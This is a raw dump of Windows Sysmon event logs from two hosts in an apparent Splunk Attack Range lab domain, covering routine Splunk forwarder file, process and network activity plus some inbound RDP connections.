Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59383-false10.0.1.12-8000- 354300x8000000000000000978820Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:37.760{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59603-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978819Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:40.495{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4048744FFE2FB9DE464C610D54744148,SHA256=6DBD74D0C7E6A647AA1EB543D7CC16013429430EA72C3D3C60762CBA7A74EAE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:41.383{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A06D0F17B0C8C54636401C1BC902E11,SHA256=5A2AAD29566794CE73E4A3EC0F1BAD8BB0E18CDA6398B98247466AA8D449C4A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978824Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:38.585{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60090-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978823Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:41.496{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07E9DEAAE6C75127B249373E8C2C62F5,SHA256=E0281550A6F2AAA526DC8B6CB62B8549CEA391407252AF5913745C19D719DC81,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:39.726{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53365-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978822Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:41.355{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B8B06B87641C4804DE527CFA0794D16,SHA256=753E9694D6C76823CC10E54416FCE3CC421C27916081D957E0A75B29C52E59D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978825Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:42.496{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CBADF3582DFFC823E4770F93959C75,SHA256=1C948ED8C41EE37ADB095BB752EE7FB766776325068CC12A46CAACDF0D03A195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:42.399{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60F60DA8EA2E8212C0AE256CED69A16B,SHA256=375C04F0BE927B6D909CA0E8BFE560D40278E0D621CC1699E80C3340AE3DBD0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978828Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:40.834{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de56261-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978827Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:43.538{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D1B13DB7E9D095D4172669BBD3DD9D,SHA256=2B03FC59ED90A6E4AA0DD6694C6B052D089AC3107B0D3066DD364AD2B356BE4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:43.419{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10FA2B36B8FD8E2AA57636C9DD4414EC,SHA256=D1386533CC9AC014E15C1C1AF37A009DAA585B36F24586096A1F40797309F2E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978826Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:43.273{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84FCBCEE0E3E07930EB6DCAB7FD148F7,SHA256=266F0A947248B00B9FE6D56B043478EB59D771D253AE44B13FD90ECFA2B7BBEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978829Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:44.773{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31DA7D078EA148877C266E1677C13355,SHA256=95ABC4E66257FC8D452F60520FAB35A1A8505F0A83C357FA5964E911A23F9A8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.918{5EBD8912-8AD0-6151-327A-00000000FC01}66326796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.881{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93E9AD29E1A3907EFFF55F4AF92051AF,SHA256=9EDBA7CCAD1D88CD059D0CFFA2A343D9F09EDA0D4AD107FFEC273921A64CC97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.881{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14C0530AD9A93E559D0BFA342F630DD5,SHA256=A8F4678829908F0F3B7A13206473F5BBC0140DC9E37C334B7AB7F62A18BEE6E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8AD0-6151-327A-00000000FC01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8AD0-6151-327A-00000000FC01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.650{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8AD0-6151-327A-00000000FC01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.635{5EBD8912-8AD0-6151-327A-00000000FC01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.434{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEDB1D5D743878C14DF13F5ED3543E51,SHA256=0217505D6CAE7C70B27836A2115BD179FDA05C16F2F7CFBF1B8AC20DE3186E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978832Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:45.773{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F03BECDC37B5519DDE6DFC893DFEF4,SHA256=D102DE8A0729A6777D8D92D96A81DDF072B5C0854E1908B233AB046FE251F7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.502{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8BA9F5AE403E5185A9ADE5A9FC74C8,SHA256=43E22D47034ADC8B4043AC171CE3108A15278BF4202568E6750DAFD6CC7EC383,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978831Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:42.913{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com43026-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978830Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:45.570{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB43CCDD72037C3F7F6FF07F5156F130,SHA256=A99D70585C1A6CDBB86DB8C21C95F39FA9047F3D6938C45276D2FA1E01FAF3C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8AD1-6151-337A-00000000FC01}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8AD1-6151-337A-00000000FC01}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.334{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8AD1-6151-337A-00000000FC01}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.319{5EBD8912-8AD1-6151-337A-00000000FC01}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.532{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program 